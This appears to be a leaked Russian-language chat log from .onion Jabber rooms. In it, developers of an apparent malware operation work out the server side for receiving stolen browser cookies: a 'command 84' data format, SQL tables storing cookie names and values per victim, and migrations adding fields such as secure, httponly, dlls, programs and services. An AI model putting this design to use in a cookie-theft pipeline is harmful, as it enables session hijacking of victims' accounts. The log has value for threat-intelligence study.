2021-08-31T09:24:57.066231  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я понял что такое куки, но к чему ты это говоришь ?
	[en] <?>
	[fr] <?>

2021-08-31T09:25:05.867647  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 1. Создать новую команду для получения данных куки. Например, код команды 84

2. Создать таблицу для хранения данных (псевдокод SQL):
CREATE TABLE cookies (
  id SERIAL,
  username VARCHAR(255),
  browser VARCHAR(255)
  domain VARCHAR(255)
  cookie_name VARCHAR(255)
  cookie_value VARCHAR(255)
  created DATETIME,
  expires DATETIME,
  path VARCHAR(255)
);

3. Обеспечить прием данных в следующем формате:
- простой текст, разделенный на строки.
Разделитель строк - может быть как UNIX, так и DOS.
Одна строка - одна запись.
Разделитель полей в записи - вертикальная черта |
Формат записи:

username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n

где

username     - имя пользователя
browser      - код броузера (enum = chrome|ff|ie|edge)
domain       - домен куки
cookie_name  - имя куки
cookie_value - значение куки
created      - дата-время создания, Unix time
expires      - дата-время истечения, Unix time
path         - путь URI
	[en] <?>
	[fr] <?>

2021-08-31T09:26:49.562426  steller@q3mcco35auwcstmt.onion
	[ru] К тому, что у меня не было этого дока. Где описание В64? Это часть формата.
	[en] <?>
	[fr] <?>

2021-08-31T09:26:49.564843  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К тому, что у меня не было этого дока. Где описание В64? Это часть формата.
	[en] <?>
	[fr] <?>

2021-08-31T09:28:37.290590  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно
	[en] <?>
	[fr] <?>

2021-08-31T09:28:51.260588  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] чтобы экранировать символы
	[en] <?>
	[fr] <?>

2021-08-31T09:29:50.573071  steller@q3mcco35auwcstmt.onion
	[ru] Ну, вот это и нужно в доку добавить.
created у нас в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:29:50.579209  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ну, вот это и нужно в доку добавить.
created у нас в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:30:27.365537  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] created_at я ставлю сам как NOW()
	[en] <?>
	[fr] <?>

2021-08-31T09:30:36.629816  steller@q3mcco35auwcstmt.onion
	[ru] Не догадываться же, как там отстойник обрабатывает, верно?
	[en] <?>
	[fr] <?>

2021-08-31T09:30:36.635220  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Не догадываться же, как там отстойник обрабатывает, верно?
	[en] <?>
	[fr] <?>

2021-08-31T09:31:00.362275  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а .есть другой ..
	[en] <?>
	[fr] <?>

2021-08-31T09:31:02.579975  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] щас посмотрю
	[en] <?>
	[fr] <?>

2021-08-31T09:31:21.646386  steller@q3mcco35auwcstmt.onion
	[ru] А NOW() в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:31:21.649113  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А NOW() в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:32:35.414623  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] забей на NOW() это другое
	[en] <?>
	[fr] <?>

2021-08-31T09:36:27.499972  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] CREATE TABLE public.data84 (
    id_low bigint NOT NULL,
    id_high bigint NOT NULL,
    "group" character varying(64),
    created_at timestamp without time zone,
    username text,
    browser text,
    domain text,
    cookie_name text,
    cookie_value text,
    created text,
    expires text,
    path text
);
	[en] <?>
	[fr] <?>

2021-08-31T09:36:31.364266  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот таблица
	[en] <?>
	[fr] <?>

2021-08-31T09:36:37.404037  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] created - просто текст
	[en] <?>
	[fr] <?>

2021-08-31T09:36:41.634723  steller@q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
	[en] <?>
	[fr] <?>

2021-08-31T09:36:41.643538  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
	[en] <?>
	[fr] <?>

2021-08-31T09:36:43.348282  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всё - просто текст
	[en] <?>
	[fr] <?>

2021-08-31T09:37:34.039861  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] > У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  
очевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.
коду уже 5 лет
	[en] <?>
	[fr] <?>

2021-08-31T09:39:30.943462  steller@q3mcco35auwcstmt.onion
	[ru] Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
	[en] <?>
	[fr] <?>

2021-08-31T09:39:30.947734  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
	[en] <?>
	[fr] <?>

2021-08-31T09:41:31.314654  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] где же ты был )
	[en] <?>
	[fr] <?>

2021-08-31T10:40:22.322792  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Zulas ты под новые поля базу тоже будешь менять?
Если да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены.
	[en] <?>
	[fr] <?>

2021-08-31T10:40:58.854756  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Я написал миграции под два поля secure и httponly
	[en] <?>
	[fr] <?>

2021-08-31T10:41:19.037337  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оба логических.
	[en] <?>
	[fr] <?>

2021-08-31T10:41:50.953214  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-08-31T10:41:53.240410  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T10:42:06.310642  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-08-31T10:42:24.070393  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T10:42:41.758802  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-08-31T10:42:55.647674  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T10:42:55.698541  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-08-31T10:44:25.980940  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-08-31T10:44:38.110043  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-08-31T10:44:40.986691  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-08-31T10:46:16.070850  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-08-31T11:01:29.530116  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

